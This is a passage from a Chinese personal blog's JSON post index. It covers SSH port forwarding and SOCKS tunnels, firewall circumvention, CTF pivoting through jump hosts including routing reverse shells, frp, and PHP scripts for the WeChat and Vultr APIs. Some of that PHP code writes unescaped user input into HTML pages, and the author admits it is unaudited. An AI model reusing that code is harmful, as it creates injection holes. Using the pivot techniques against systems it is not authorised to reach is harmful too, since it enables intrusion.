yes，设置好了之后别忘了在服务器的防火墙和服务器托管商的防火墙那里放行端口。端口映射假如上面的穿透你设置好了，但是你说你不知道sshd配置文件在哪里？防火墙关不掉？服务器不是你的？好家伙，那内网穿透还搞什么？没关系，SSH比你想象的要厉害，假如你没办法开服务器的端口，那你可以把服务器上面的端口映射到本机上。   那么现在内网穿透已经搞好了，但是由于各种各样的原因你访问不到服务器的端口，这时候你在外面，可以在外面用电脑执行以下命令：ssh -CfNL 3390:127.0.0.1:3389 root@remote-ip这样一波操作，你家里的那台电脑上的3389端口就被映射到了你现在用的电脑上的3390端口了，当然效率很低这个没办法，毕竟SSH这些功能没有完全流行起来也是因为它的效率确实低，而且还容易断，也没个自带的断线重连……代理隧道虽然说我现在很想吐槽一下SSH并且想要赶紧说说它的一些上位替代，不过我还是先把所有的SSH厉害的功能讲完吧。   SSH更厉害的功能就是随手开代理，又叫做动态端口映射，一般来说如果想要在服务器上配置一个代理很麻烦而且也很费时间，但是如果用SSH隧道开一个代理就只用一条命令，而且还不需要在服务器上做任何配置，真的是非常的方便。  具体是什么命令呢？很简单，就是这样：ssh -CfND 127.0.0.1:1080 root@remote-ip执行这条命令之后就会在本机开一个监听地址为127.0.0.1:1080的socks5代理，你可以使用Proxifier之类的socks5客户端去连接它，然后就能直接通过这个代理用服务器上网了。假如你还想把这个代理共享给其他同在局域网的人用，可以把127.0.0.1改成0.0.0.0并且加一个-g的参数，这样同网络的人也就可以通过你的电脑连接到隧道上了。   当然这个相比于上面那个端口映射要厉害一些，不过如果没有socks5客户端就只能用上面那个了。   另外如果有国外的服务器，也可以使用这种方式穿过防火长城，而且因为它是走的SSH隧道，基本上很难通过流量分析看出来你在做什么，可惜就是效率太低，很慢，所以即使它抗封锁能力不错，但是用的人不是很多……   所以呢，SSH作为系统自带的软件，功能已经是非常强大了，有这些功能基本上可以在一定程度上无视防火墙，随便穿，轻松透，而且再加上scp、sftp等功能，连接不同的电脑真的是从未如此轻松。   很可惜，这么好的软件效率太低了，我试了一下用把同网络下的树莓派做成代理，速度基本上只能达到10Mbps左右，可能看1080p的直播没有问题，再高一些的蓝光视频还是不太行，会时不时的卡，另外就更不用说连接国外的服务器了，看网页确确实实没有问题，视频的话也只是勉强能看，体验还是不够好。虽然它作为默认安装的软件很不错，但是我们还是要考虑体验的嘛，所以我就来说说它的一些上位替代品吧。SSH部分功能的上位替代内网穿透假如想要自己做一个内网穿透，目前以我自己的感受来说，感觉还是frp最好用，应该说不愧是Golang写的程序，配置简单，即开即用。下载一个frps的程序放在公网的服务器上，基本上用默认的配置就可以直接使用，不过为了安全还是建议稍微改一改，默认情况下是没有验证和加密的。内网机器的话就用frpc连接就可以了，具体怎么搭建官方文档已经说的很清楚了，这里就不再多描述。另外如果没有公网服务器也可以试试SakuraFrp，不过他们家貌似看起来快凉了，国内节点要花1CNY实名认证，国外节点目前凉的差不多了，而且貌似经常受到攻击，现在想充钱也充不了，还是挺糟糕的。   不过他们倒是挺良心的给了个友商列表，如果自己没服务器的话用这些服务商也是个不错的选择。代理隧道要是整正儿八经的隧道，还是得用Shadowsocks或者是V2ray之类的，一是反检测还是很厉害的，二是效率高，这些隧道软件速度是真的没话说，确实相比SSH隧道而言要快很多。如果要搭Shadowsocks-libev可以看看这篇文章，V2ray的话GitHub上有很多那种一键脚本，直接用的话也没问题，包括也有更稳当的Cloudflare+ws+tls模式非常的不错。   还有就是个人经验吧，如果真想好好上，最好不要自己租云服务器，因为大多数人没经验，不知道哪个线路好，搭出来性价比没有机场高，速度也没机场快，节点少，而且被封的成本更高，所以真要用还是去租机场比较合适。   因为我实际上对搞这些隧道并没有什么特别厉害的经验 （不然我为啥不去开机场😂？） ，所以这里就不再过多描述了。任意互联示例既然目前已经有办法任意访问或者映射端口，那么内网对于我们来说就不会有太多阻碍了（不过如果完全没有公网IP我确实真想不出来怎么搞，就是nat穿透还要一个接线的服务器）。这些东西假如以后打CTF还是蛮有用的，有时候CTF会特地出几个内网隔离的机器，要用跳板，除了用NC，SSH也算是个不错的选择了。有防火墙？直接把靶服务映射到自己机器上打，打起来和没防火墙一个手感。再不行直接代理接过去装作目标主机，扫描的时候也会方便很多。反弹shell连不到自己主机？把自己映射到跳板机上吧，各种连接轻松搞定。   就是不打CTF，就说在外面突然想下论文，学校能上知网？挂个树莓派在学校，frp连到公网服务器，SSH隧道开代理，然后就能随便下论文了。总结我现在又感觉互联的网络回来了，看来就是有内网、防火墙也阻挡不了两台逻辑上能连接的主机。SSH真的是很厉害啊……虽然我才知道这一点，不过这也就是学习的过程嘛，了解了这个也许对网络有了更深入的认识吧……" },{ "title": "Mayx的运维笔记 - 隐藏自己", "category": "", "tags": "运维, 笔记, 隐藏", "url": "/2021/04/18/hide.html", "date": "2021/04/18", "content": "互联网是个很危险的地方……起因最近几天我维护的花火学园貌似时不时的会爆内存……不过这倒是也是正常的事情，PHP好像默认情况下不会自己释放内存，我之前本来是想把那个运行模式改成ondemand，但是看网上说好像都不怎么推荐……但是既然已经爆了几次内存，那我也没得选了，就把运行模式改了。   在检查服务器的这段时间里，我发现居然有一个不自量力的家伙在爆破我的服务器，看IP是159.89.47.109，随便访问了一下想不到上面还跑了个网站？不知道是这个网站被黑了变成肉鸡了还是这个网站的所有人确实脑子有问题……解决IP泄露总之无论如何这已经证明了论坛的真实IP已经泄露了，因为我开了很多防火墙白名单，对网络流量这一块限制的很严格，所以正常情况下外面是不应该知道我的网站IP的，不过我的SSH端口虽然改了，但是因为我的位置经常在变，所以这个并没有设置白名单。   不过还有一个可能性，最近貌似有个自称Tyosakuken FANZA的家伙给我们的运营商发了DMCA投诉，CloudFlare是真的会把真实IP告诉投诉者的。我不知道这个发投诉的人是个啥情况，总之这个公司貌似是日本的，先把日本的流量全封了再说。   另外IP肯定是要改了，正好趁这个机会干脆再小幅度的升一下服务器的配置好了，之前一直用的是Vultr的Cloud Compute，这次试试High Frequency说不定速度会变快。于是我就用快照重新部署了一下服务器。结果在等它部署的期间居然睡着了😂，这下可用率又要掉了。   不过SSH端口这个……我也不能每次要用的时候再去开它，那样很麻烦，所以……我想了想，要不然就用frp吧，直接不开放SSH端口，流量就从frp里经过，而且这个东西还支持访问验证，这样也能避免被扫了，不过我确实还是没办法确认这个东西的安全性，不知道这到底是提高了破解难度还是放了个定时炸弹……毕竟它是可以无视防火墙的啊。更新快照脚本换了IP之后服务器的ID也跟着一起变了，我正打算改这个东西的时候发现Vultr怎么也变了，原来用的是SUBID，现在变成了实例ID了……当时我不是很精通API所以是从网上随便找的脚本，现在我用PHP调API调的也算熟练了吧，正好这次V1的API貌似要被废弃了，我就看看文档，整个V2的API吧。代码如下：<?php$api_key=\"APIKey\";$instance_id=\"实例ID\";file_get_contents(\"https://api.vultr.com/v2/snapshots\", false, stream_context_create(array('http' => array('method'=>'POST','header'=>\"Content-Type: application/json;charset=utf-8\\r\\nAuthorization: Bearer \".$api_key,'content'=>'{\"instance_id\": \"'.$instance_id.'\"}'))));$snapshot_list=json_decode(file_get_contents(\"https://api.vultr.com/v2/snapshots\",false,stream_context_create(array('http' => array('method'=>'GET','header'=>\"Authorization: Bearer \".$api_key)))),true);if($snapshot_list[\"meta\"][\"total\"]>10){\tfile_get_contents(\"https://api.vultr.com/v2/snapshots/\".$snapshot_list[\"snapshots\"][0][\"id\"],false,stream_context_create(array('http' => array('method'=>'DELETE','header'=>\"Authorization: Bearer \".$api_key))));}像这个也可以整合我之前写的测试号通知或者企业号通知来用，用之前记得加上addslashes，不然可能会出问题。   另外这个V2的API貌似还是RESTful的呢，看起来倒是更简单易懂了。总结总之在网上一定要注意网站安全，一旦有出问题的迹象要赶紧备份，有必要的情况该换IP就只能换了。" },{ "title": "自制微信二维码登录API", "category": "", "tags": "微信, 登录, 验证, PHP", "url": "/2021/04/09/weauth.html", "date": "2021/04/09", "content": "二维码登录看来也不是什么复杂的东西嘛起因前段时间我用了一位大佬的认证公众号做了一个微信推送的API，并且希望把它做成像WxPusher那样的平台。但是吧……我想了想，现在微服务不是比较火嘛，WxPusher那种的实在是太臃肿了，而且还是用Java写的，那就更加垃圾了，所以我决定把功能模块化，让每一个功能都可以单独运行，互不影响。   而今天我要做的就是允许A用户（开发者）使用微信扫描二维码的方式去获取B用户（客户）的用户ID。当然这种功能的话肯定还是用PHP完成的啦，所以代码如下：代码<?php$appid='公众号APPID';$secret='公众号Secret';$token='和配置的Token配置一致即可';ini_set('session.gc_maxlifetime', 7200);session_id('Storagepush');session_start();if(!json_decode(file_get_contents('https://api.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token='.$_SESSION['access_token']),true)['ip_list']){$_SESSION['access_token']=json_decode(file_get_contents('https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid='.$appid.'&secret='.$secret),true)['access_token'];}if(isset($_GET[\"action\"])&&isset($_GET[\"key\"])){$_GET[\"key\"]=addslashes($_GET[\"key\"]);if(strlen($_GET[\"key\"])<6||strlen($_GET[\"key\"])>32){    die(\"Bad Key\");}if($_GET[\"action\"] == \"set\"){    echo file_get_contents('https://api.weixin.qq.com/cgi-bin/qrcode/create?access_token='.$_SESSION['access_token'], false, stream_context_create(array('http' => array('method'=>'POST','header'=>\"Content-Type: application/json;charset=utf-8\",'content'=>'{\"expire_seconds\": 3600, \"action_name\": \"QR_STR_SCENE\", \"action_info\": {\"scene\": {\"scene_str\": \"auth'.$_GET[\"key\"].'\"}}}'))));}if ($_GET[\"action\"] == \"get\") {    if(isset($_SESSION['wxboxauth'.$_GET[\"key\"]])){        echo $_SESSION['wxboxauth'.$_GET[\"key\"]];    }else{        echo \"Empty\";    }}}else{$timestamp=$_GET[\"timestamp\"];$nonce=$_GET[\"nonce\"];$tmpArr=array($token, $timestamp, $nonce);sort($tmpArr, SORT_STRING);if( sha1(implode($tmpArr)) == $_GET[\"signature\"] ){if($_GET[\"echostr\"]){echo $_GET[\"echostr\"];}else{//  加载XML内容$content = file_get_contents(\"php://input\");$p = xml_parser_create();xml_parse_into_struct($p, $content, $vals, $index);xml_parser_free($p);if(($vals[$index['EVENT'][0]]['value'] == \"subscribe\" || $vals[$index['EVENT'][0]]['value'] == \"SCAN\") && isset($vals[$index['EVENTKEY'][0]]['value'])){    if($vals[$index['EVENT'][0]]['value'] == \"subscribe\"){        $vals[$index['EVENTKEY'][0]]['value'] = substr($vals[$index['EVENTKEY'][0]]['value'],8);    }    $_SESSION['wxbox'.$vals[$index['EVENTKEY'][0]]['value']] = $vals[$index['FROMUSERNAME'][0]]['value'];    echo '<xml>  <ToUserName><![CDATA['.$vals[$index['FROMUSERNAME'][0]]['value'].']]></ToUserName>  <FromUserName><![CDATA['.$vals[$index['TOUSERNAME'][0]]['value'].']]></FromUserName>  <CreateTime>'.time().'</CreateTime>  <MsgType><![CDATA[text]]></MsgType>  <Content><![CDATA[成功请求登录！]]></Content></xml>';}else{echo \"success\";}}}else{    echo \"Fail\";}}使用文档接口调用方法            参数      是否必填      请求方法      内容                  action      是      GET      set/get              key      是      GET      6-32字节长度的随机字符串      说明开发者需要先使用set方法设置一个存储用户OPENID的盒子，使用key来命名，为了避免重复，这里推荐使用32位的UUID作为名称，请求完成之后会获得一个有效时长为1小时的二维码的ticket和二维码的地址，可以如果希望自己生成二维码，可以使用返回的URL作为二维码的内容，或者也可以调用微信的Ticket转二维码接口，在https://mp.weixin.qq.com/cgi-bin/showqrcode?ticket=后面加上获得的Ticket就可以直接获得二维码的图片。   获取OPENID需要使用get方法去获得命名为key的盒子，如果用户已经扫描了二维码，那么调用此接口会直接返回扫描者的OPENID，如果没有扫描或者用户扫描后超过了2个小时，就会返回Empty，以表示盒子为空。使用示例像我之前写的微信推送中不是就需要这个用户的OPENID嘛，假如一个网站想要主动给某些用户推送消息，就可以先调用这个接口获得用户的OPENID，然后存起来，有必要时可以直接使用微信推送来给用户推送信息。另外这个OPENID是唯一的，所以假如想做网站二维码扫描绑定登录同样也可以使用这个接口。具体实现就非常简单了，所以示例代码我就不写了。注意事项像这个代码依然不防滥用，并且我也没有检验过安全性，是有很大可能有漏洞的。所以有懂安全的大佬也可以指点一下，来完善这个项目。" },{ "title": "亲自体验微信推送的制作感受", "category": "", "tags": "微信, 推送", "url": "/2021/03/23/wxpush.html", "date": "2021/03/23", "content": "感谢大佬完成了最复杂的部分😂起因我在上个月写了一个Server酱Mini测试号版，在此之后有位叫做guanzi008大佬看到了我的文章，并愿意给我提供一个有微信认证的公众号让我体验一下Server酱的实际制作过程，对此我表示非常感谢，把最复杂的事情做完了。像那个Server酱那个平台说过Ta唯一做的事情就是注册了一个有微信认证的公众号而已，毕竟微信开放文档傻子都能看懂，没什么技术难度。   正好这次有了这个机会，我就可以真正体验一下测试号和通过了微信认证的服务号之间到底有什么样的区别。实际体验我以前虽然没有微信认证的公众号，不过曾经有用过同学注册的一个个人的公众号，那个是真的废物，接口几乎全都不能用……现在有了微信认证的公众号之后发现虽然这个非常不错，功能基本上该有的都有了，不过有一些地方还是和测试号各有千秋。比如说测试号的监察要松的多，像模板消息根本没有限制，而且无论发什么东西都不用担心封号。而这个认证公众号的监察就要严的多，直接发违法消息肯定是别想了，就说模板消息还必须要用已有的模板，用没有的必须要通过审核。另外我感觉那个所谓的模板消息下线应该是烟雾弹，人家官方文档说的很清楚，服务号订阅通知功能开启灰度测试，模板消息能力可正常使用，所以不用太担心。   那个所谓的订阅通知的功能我已经试过了，很烂，要想推送必须要让用户同意，而且是每一次，也就是说用户同意一次才有一次的通知权，所以说就很废物。倒是有一个长期订阅，就是搞起来非常麻烦。还好模板消息目前来看是只要申请就可以使用。所以接下来我就完善了一下我之前在测试号上用的代码，增加了Access Token缓存，支持POST请求，并且增加了摘要、HTML、Markdown等功能，代码如下：<?php$appid='公众号APPID';$secret='公众号Secret';$userid=$_GET['userid'];$template_id='模板ID';$title=addslashes($_REQUEST['title']);$summary=addslashes($_REQUEST['summary']);$content=addslashes($_REQUEST['content']);$addHTML=\"\";session_id('Storagepush');session_start();if(!$summary){    $summary=$content;}if(!json_decode(file_get_contents('https://api.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token='.$_SESSION['access_token']),true)['ip_list']){$_SESSION['access_token']=json_decode(file_get_contents('https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid='.$appid.'&secret='.$secret),true)['access_token'];}if($_GET['type'] == \"md\"){    include_once(\"Parsedown.php\");    $Parsedown = new Parsedown();    //$Parsedown->setSafeMode(true);    $content = $Parsedown->text($content);    $_GET['type'] = \"html\";}if($_GET['type'] == \"html\"){    $filename='html/'.md5(uniqid(mt_rand(), true)).'.html';    file_put_contents($filename, '<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"><title>'.$title.'</title><h1>'.$title.'</h1><hr>'.$content.'<hr><center>Powered By <a href=\"https://mabbs.github.io/\">Mayx</a></center>');    $addHTML='\"url\":\"https://'.$_SERVER['HTTP_HOST'].'/'.$filename.'\", ';}echo file_get_contents('https://api.weixin.qq.com/cgi-bin/message/template/send?access_token='.$_SESSION['access_token'], false, stream_context_create(array('http' => array('method'=>'post','header'=>\"Content-Type: application/json;charset=utf-8\",'content'=>'{\"touser\":\"'.$userid.'\",\"template_id\":\"'.$template_id.'\", '.$addHTML.'\"data\":{\"first\": {\"value\":\"'.$title.'\"}, \"keyword1\": {\"value\":\"'.$summary.'\"}, \"keyword2\": {\"value\":\"'.date('Y-m-d H:i:s').'\"}}}'))));要想使用这个代码的话需要用到Parsedown的库，另外模板消息我用的是ID为OPENTM207965242的模板，如果有人想要用的话也建议用同一个模板。   另外对于用户的OPENID的获取……想用的话就自己想办法吧，获取OPENID这种事情很简单。   从体验上来说应该是吊打Server酱那种垃圾，而且还没有广告。理论上最大每日推送量是10w次，当账号粉丝数超过10W/100W/1000W时，模板消息的日调用上限会相应提升。不过这个不防滥用，所以还是需要注意一点的。使用文档            参数      是否必填      请求方法      内容                  userid      是      GET      用户的OPENID              type      否      GET      html/md/空              title      否      GET/POST      标题              summary      否      GET/POST      摘要（不填默认为内容）              content      否      GET/POST      内容      后续的改进我目前用的公众号的所有人希望整一个像WxPusher的平台，我大概看了一下那个东西，果然还是个垃圾，要推送必须用那个平台特有的API，包括开源的那些乱七八糟的SDK也全部都是为那个所谓推送平台设计的，另外模板的选择也是真的没什么品味，体验实在是一般。所以目前似乎还没有一个像样的开源的微信推送平台，那接下来就让我试试看吧，我看看到底是为什么没有人愿意制作一个开源的微信推送平台吧！" },{ "title": "使用CloudFlare Workers做一些有趣的功能", "category": "", "tags": "CloudFlare, Workers", "url": "/2021/03/02/workers.html", "date": "2021/03/02", "content": "挺不错，但是还是不如PHP起因之前搞微信图片机器人的时候，我看到P站的图片反代给了一个自己在CloudFlare Workers上建反向代理的代码。   虽然我很早就在用CloudFlare，也知道Workers这个功能，不过我的JavaScript水平不太行，而且当时这个功能还不够完善，就没怎么管，不过既然又见到了，那就来玩玩试试看吧，现在的这个Workers功能不仅已经很完善，而且免费版的限制也少了很多，甚至还支持1G的KV存储。首先给自己搭个反代之前我用PHP给自己的博客搭了一个简单的反代，不过我用的那个服务商不太行，速度有点慢，而且也不是所有的PHP空间都支持伪静态。那既然有CloudFlare Workers那我们就来试试用这个实现吧。   代码如下：addEventListener(\"fetch\", event => {  let url = new URL(event.request.url);  url.hostname = \"mabbs.github.io\";  event.respondWith(fetch(new Request(url, event.request)));});看起来代码好像更简单了，可惜我的JavaScript水平不行，最多只能照猫画虎，自己写不来……   最终做出来的网址如下： https://blog.mayx.workers.dev/ ，这也算是我博客的另一个为了在国内能访问的域名吧……如果自己有域名的话可以设置路由把其他域名绑在上面。   不过CloudFlare Workers也有一些缺陷，那就是有请求次数限制，免费版只有10w次/天的访问次数限制，对于我这种小站还行，大一点的请求次数一阵子就用光了，相比于限流量的PHP空间，用CloudFlare Workers做这种请求比较密集的站并不合适，不过这个不限流量，如果用来代理下载比较大的文件还是挺不错的。给自己的网站搭一个Status Page吧我在看Workers的一些介绍时看到了一个很有意思的东西，就是Status Page，用来监测网站可用性的，看起来很有意思而且部署非常简单，具体可以看文档。   这个东西支持一键部署，只要按照说明，很轻松就能搭一个属于自己的Status Page，另外我也给花火学园搭了一个Hanabi Status Page，看起来很专业的样子。其他玩法其实这就是所谓的Serverless的云函数吧，我以前玩LeanCloud的时候就玩过了，本质其实和那些虚拟网站空间差不多，只是可能和平台的集成度更高，有一堆自制的API，所以效率更高吧。像OneIndex当时也有CloudFlare Workers版的，就是功能有点少，所以我还是搭的PHP版。   如果自己有能力开发的话利用那个KV存储其实想开发什么网站都可以，而且这个支持的语言也很多，甚至也支持PHP，就是和一般的PHP感觉不太一样……    比如我之前开发的图片机器人、Server酱自制版等等都可以用CloudFlare Workers重写。   像这样甚至自己写一个论坛都没问题，不过免费版的限制还是挺多的，虽然1G的KV存储还是挺大的，但是10w次/天的访问还是太少了，要用的话还是不够……如果做成前后端分离的那种可能还好，一个页面就一次请求，要是没有分离的话访问一次就要请求好多次了，相比之下不考虑流量的话可能免费的虚拟网站空间还能支持更多的请求。总结总之现在Serverless也算是一个现在比较流行的东西（有人说Workers是边缘计算，不过我感觉现在应该不算了），从云计算来看应该算PaaS吧？还是BaaS（后端即服务，不是什么区块链）？倒是可以玩玩试试看，不过也就小公司可能会因为相对便宜而用，大公司肯定不会把业务放到这种东西上，万一这个服务没了，那曾经写的代码可能就全都没用了，如果做了兼容层还好，毕竟每一个平台的API都不一样，现在的Serverless厂家又不可能统一成什么联盟，挂了就没了，但是在服务器上自己写和部署的代码，无论是哪个服务器都可以运行，所以这个也就只能是玩玩看，未来这个可能不会有很大的发展。" },{ "title": "如何给DiscuzX添加像原生一样的404页面", "category": "", "tags": "PHP, DiscuzX", "url": "/2021/02/28/discuz.html", "date": "2021/02/28", "content": "简单的提高用户体验起因像现在的新网站，由于使用的引擎越来越先进，网站的路径看起来非常的不错，那些一般开发的时候把它叫做路由。   而过去的网站不一样，以前的网站程序大多都是以文件形式存在，访问的时候都是服务器程序去读取相对应的文件。像PHP算是有点年头了，尤其像我这种不喜欢用框架，就喜欢原生PHP的人更是如此。   但是以前也是有让访问的URL变得花里胡哨的办法的，一般我们把那个叫做伪静态，那个一般是由服务器程序根据规则把对应的路径重写成文件的物理地址。   不过也有不少引擎会把所有情况的路径重写到一个文件中，再由一个文件慢慢处理，其实这个已经算是路由了，像我之前写的超简单反代就是这样的，包括一些博客引擎，比如WordPress、Typecho等等，还有一些CMS也支持。   然而很遗憾的是，DiscuzX作为一款有年代的论坛引擎，它不会接收所有的请求到处理程序中去，这就导致了一个问题，那就是错误的请求不会由DiscuzX处理，而是由服务器程序处理。   所以DiscuzX在遇到路径404的问题时，就只是白底黑字，大大的写着404 Not Found而已，很丑，一般的处理方法也不过是自己单独整一个404页面，显得和网站风格很不匹配。   所以今天我要解决这个问题，让这种有年代的程序也显得稍微现代化一点点。解决方法其实解决这个问题很简单，调用DiscuzX的程序去生成这个页面就行了，所以以下就是生成这个页面的代码（因为是看着模板变量随便写的，可能有多余的代码，但反正能用）：<?phpdefine('CURSCRIPT', '404');require './source/class/class_core.php';C::app()->init();$navtitle = \"提示信息\"; $show_message = \"抱歉，您访问的页面不存在\";$alerttype = 'alert_error';$allowreturn = 1;$param['msgtype'] = 1;include template('common/showmessage');把这个文件保存为404.php，然后放到网站根目录就行了，然后再把服务器配置里的错误页面设置为这个文件，像Nginx的话可以在server段里加一句error_page 404 /404.php;就OK了。总结目前来看好像我见到的几乎所有论坛（即使不是DiscuzX），都没能做到404页面和网站完美融合，也许我是第一个写这种东西的人吗😀？这样就能很简单的提高特别情况下的网站体验了吧……" },{ "title": "做一个Server酱·TurboMini企业应用版", "category": "", "tags": "Server, PHP, 微信", "url": "/2021/02/26/serverchancorp.html", "date": "2021/02/26", "content": "简单的事情应该自己去做起因这个月初，由于Server酱要挂了然后Turbo版又要钱所以我特地写了一个Server酱·TurboMini测试号版，然而据那个开发Server酱的人说微信要下掉的是模板消息，而不是故意坑人不做这个东西了。过了一段时间后那个开发者说可以用企业微信啥的通道继续搞，顺便还给普通账户使用Turbo版的一点点权限，然后价格似乎也稍微降了一点？   但问题是我们之所以使用Server酱只是因为注册服务号很麻烦，微信认证要主体，所以我们才用，用这个的人也应该都是开发者吧？那如果说资源都是我们出的话还何必用那个一堆广告的Server酱呢？而且想好好用还要花钱，都是开发者了没必要交这种智商税吧？   不过看在它还给我们推荐了些路子，那也就不用太过分的说它了吧。如何制作？我也倒是去看了看企业微信的开发文档，和公众号的开发文档那就是大同小异啊，所以今天依然是一句话解决问题：<?php$cid='企业ID';$agentId='应用ID/AgentId';$secret='应用Secret';$userid='@all';//用户ID，不知道可以不改$title='标题';$content='内容';file_get_contents('https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token='.json_decode(file_get_contents('https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid='.$cid.'&corpsecret='.$secret),true)['access_token'],false,stream_context_create(['http' => array('method'=>'POST','header'=>\"content-type: application/json; charset=UTF-8\",'content'=>'{\"touser\":\"'.$userid.'\",\"msgtype\":\"text\",\"agentid\":'.$agentId.',\"text\":{\"content\":\"'.$title.'\\n'.$content.'\"}}')]));从体验上来说的话这个企业应用版的体验还是不错的，和测试号相比首先可以在主页显示，虽然有二级但是两边的图标和名字都是可以自定义的，而且API的调用次数也要比测试号多很多，用起来还是挺不错的，和测试号比唯一的缺点应该就是首次配置有点麻烦。   另外我在写这个东西的时候发现这个API还是和测试号的API不太一样，测试号那个在发post请求的时候post可以小写，但是这个垃圾企业微信的API的POST必须大写，不然就400，搞得我调试了半天才调试好。如何配置？一样这个是兼容Server酱的，需要的参数和Server酱需要的一样多，所以配置也是完全兼容的。不过考虑到Server酱可怜的连每月5kw次请求都受不住，配置方法我就在这里再写一遍吧：第一步，注册企业用电脑打开企业微信官网，注册一个企业第二步，创建应用注册成功后，点「管理企业」进入管理界面，选择「应用管理」 → 「自建」 → 「创建应用」    应用名称随便填，比如「Mayx的机器人」，应用logo随便找一个就行，可见范围可以选择自己，如果想推送给其他人就选公司。   创建完成后进入应用详情页，可以得到应用ID(agentid)，应用Secret(secret)，复制并填到代码中。第三步，获取企业ID进入「我的企业」页面，拉到最下边，可以看到企业ID，复制并填到上方。   推送UID不知道怎么填就直接填@all，推送给公司全员。第四步，推送消息到微信进入「我的企业」 → 「微信插件」，拉到下边扫描二维码，关注以后即可收到推送的消息。   这里一样图标觉得不好看也可以自己改。可以改进的地方首先，目前的这个版本是直接发送的信息，所以不支持Markdown，看起来也很丑。其实呢，我看文档里有说可以直接发Markdown消息，不过这样的话微信接收不到……   其实测试号版那个我看完文档之后就在想如果能把内容写到图文消息里也不错啊，可惜图文消息那个要一张头图，做不到开箱即用，这个企业微信版一样也有这个问题……   另外我还看到在文档里有一个文本卡片消息非常的不错，但是有一个问题是我不知道为啥它的URL是必选的，那这样的话同样我也没办法做到开箱即用……   当然要做的话也不难，自己去看官方文档就好了，也没有多复杂。   另外测试号版就算模板消息不能用，那也不是不能推送啊，用群发预览接口不好吗？虽然有每天100次的限制，但又不是不能用啊，而且还能减少对Server酱服务器的压力，我看这所谓要捐助维护就是想着赚钱，那么多广告早就够交服务器费用了，我也是维护网站的还能不知道这请求要多少钱的服务器？   然后看微信发的下线模板消息的通知，应该大概率不会下线这个功能，只是说了灰度测试而已，有可能只是多加了比如授权之类的操作而已。总结其实要不是Server酱有那么多广告，还以捐赠名义收费，而且还限制那么多的话其实也还算不错的产品，而且也是它给了我看微信开发文档的动力，让我在假期里还有点事干。只是既然最重要的服务号就要没了，那么它也该被开发者们放弃了吧。" },{ "title": "快速自制微信图片机器人", "category": "", "tags": "微信, 图片, Pixiv, 机器人, PHP", "url": "/2021/02/23/picbotpro.html", "date": "2021/02/23", "content": "优化真的是很复杂啊……起因前段时间，我做出来了能发图片的机器人，做出来之后我拿给群友们体验，但是很遗憾的是那个代码实在是不太行，首先有2个问题，第一是微信获取access_token的次数是有限的，我的第一版代码在每一次调用都去获取access_token，这样很快次数就会消耗光，后来我稍微改进了一下，设置了个缓存，结果呢，我检测的时候用了次数更少的接口……简直是太蠢了……之后呢？结果今天发现代码里有两个获取access_token的地方，缓存完全没起到作用……   总之上面的问题各种波折总算是解决好了，然后还有一个问题是我的图片来源是Lolicon API，然后调用限制是300次/天，说实话，对于一个人来说这个数量是够了，但是如果有很多人，像测试号最多能容纳100人，那每天每人也就只有3次调用的机会。   那要怎么解决调用次数的问题呢？我首先想的就是缓存结果。解决API调用次数过少的问题因为对于图片来说，基本上没有什么变化的信息，所以如果能将每一次的结果缓存的话其实也没有问题。所以说干就干，我单独开了一个仓库pixiv-index用来存储缓存的结果，具体代码的话都在这个仓库里面，每天会调用那个API直到用完次数。   考虑到大多数情况下也不需要原图，所以这个API里的图片都只是长或宽最大为1200px的缩略图。   使用方法也很简单，像PHP的话就可以这样写：<?php$raw=json_decode(file_get_contents(\"https://mabbs.github.io/pixiv-index/index.json\"),true);echo file_get_contents('https://mabbs.github.io/pixiv-index/data/'.$raw[rand(0,count($raw)-1)]);虽然问题解决了，但是我发现了一个巨大的缺陷，我设计这个脚本的初心是想着它有非常多的数据供我调用，结果我发现我错了，之前没有仔细看他们的文档，现在看了才发现，我想要的图片他们也只有仅仅3361张而已，实在是太少了，而总共的图片数量也只有17285张而已（即使那个站的数据也在以非常缓慢的速度增加）……   我只是懒得去别的地方找，而且因为这个API作者说那些图片都是Ta精心挑选的我才特意写了那个仓库的那些脚本，还特地学了一下Github Action…… （虽然实际上是抄的那个给开发者账号续命的那个仓库lol）新的代码解决了那些问题之后我又稍微优化了一下，把聊天机器人的功能剥离掉了，免得那个图灵机器人的API让人混乱。<?php$appid='微信appID';$secret='微信appsecret';$token='和配置的Token配置一致即可';$source='https://i.pximg.net';ini_set('session.gc_maxlifetime', 7200);ignore_user_abort(true);set_time_limit(0);session_id('Storage');session_start();if(!json_decode(file_get_contents('https://api.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token='.$_SESSION['access_token']),true)['ip_list']){$_SESSION['access_token']=json_decode(file_get_contents('https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid='.$appid.'&secret='.$secret),true)['access_token'];}if($_GET[\"upap\"]){define('MULTIPART_BOUNDARY', '--------------------------'.microtime(true));$retry=3;while(!$picdata||$retry<=0){$raw=json_decode(file_get_contents(\"https://mabbs.github.io/pixiv-index/index.json\"),true);$picdata=file_get_contents($source.json_decode(file_get_contents('https://mabbs.github.io/pixiv-index/data/'.$raw[rand(0,count($raw)-1)]),true)['url'], false, stream_context_create(array('http' => array('method' => 'GET','header' => \"referer: https://www.pixiv.net/\"))));$retry-=1;}$context = stream_context_create(array(    'http' => array(          'method' => 'POST',          'header' => 'Content-Type: multipart/form-data; boundary='.MULTIPART_BOUNDARY,          'content' => \"--\".MULTIPART_BOUNDARY.\"\\r\\n\".            \"Content-Disposition: filename=\\\"image.jpg\\\"\\r\\n\".            \"Content-Type: image/jpg\\r\\n\\r\\n\".            $picdata.\"\\r\\n\".            \"--\".MULTIPART_BOUNDARY.\"--\\r\\n\"    )));file_get_contents('https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token='.$_SESSION['access_token'] , false, stream_context_create(array('http' => array('method' => 'POST','header' => 'Content-type: application/json;charset=utf-8','content' => '{    \"touser\":\"'.$_GET[\"openid\"].'\",    \"msgtype\":\"image\",    \"image\":    {      \"media_id\":\"'.json_decode(file_get_contents('https://api.weixin.qq.com/cgi-bin/media/upload?access_token='.$_SESSION['access_token'].'&type=image', false, $context),true)['media_id'].'\"    }}'))));exit();}$timestamp=$_GET[\"timestamp\"];$nonce=$_GET[\"nonce\"];$tmpArr=array($token, $timestamp, $nonce);sort($tmpArr, SORT_STRING);if( 